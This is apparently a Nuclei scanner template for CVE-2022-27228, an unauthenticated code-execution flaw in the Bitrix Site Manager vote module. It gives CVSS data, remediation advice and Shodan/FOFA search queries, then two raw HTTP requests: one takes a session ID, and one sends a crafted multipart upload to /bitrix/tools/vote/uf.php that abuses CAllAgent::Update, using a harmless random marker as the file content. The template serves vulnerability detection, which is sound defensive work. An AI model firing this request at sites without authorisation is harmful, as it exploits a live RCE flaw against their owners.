id: CVE-2022-27228

info:
  name: Bitrix Site Manager - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: In the vote (aka "Polls, Votes") module before 21.0.100 of Bitrix Site Manager, a remote unauthenticated attacker can execute arbitrary code.
  impact: Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: Update to version 21.0.100 or later.
  reference:
    - https://alt3r.eg0.ru/p0c5/attacking_bitrix.pdf
    - https://pentestnotes.ru/notes/bitrix_pentest_full/#rce-vote_agentphp-cve-2022-27228
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-27228
    cwe-id: CWE-20
    epss-score: 0.92388
    epss-percentile: 0.99743
    cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    vendor: bitrix24
    product: bitrix24
    shodan-query: "/bitrix/p3p.xml"
    fofa-query: body="/bitrix/"
  tags: cve,cve2022,bitrix,file-upload,rce,intrusive,vkev

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"
  marker: "{{randstr}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /bitrix/admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'bitrix_sessid')"
        internal: true

    extractors:
      - type: regex
        group: 1
        name: session_id
        regex:
          - "'bitrix_sessid':'(.*?)'"
        internal: true

  - raw:
      - |
        POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx

        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_files[bitrix50][NAME]"

        {{filename}}.txt
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_files[bitrix50][NAME]";filename="{{filename}}.jpg"
        Content-Type: image/jpeg

        {{marker}}
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[packageIndex]"

        pIndex101
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[mode]"

        upload
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="sessid"

        {{session_id}}
        -----------------------------xxxxxxxxxxxx
        Content-Disposition: form-data; name="bxu_info[filesCount]"

        1
        -----------------------------xxxxxxxxxxxx--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"status\":\"done\"")'
        condition: and
# digest: 4b0a00483046022100bf14b2639e4120eb72e9c82af7f0bda37121f10a3d8682647d6251e0470146e7022100899f330942d2ef291138ac28a519e9567d5084fa39aac6ece36fcb4faf2c1e06:922c64590222798bb761d5b6d8e72950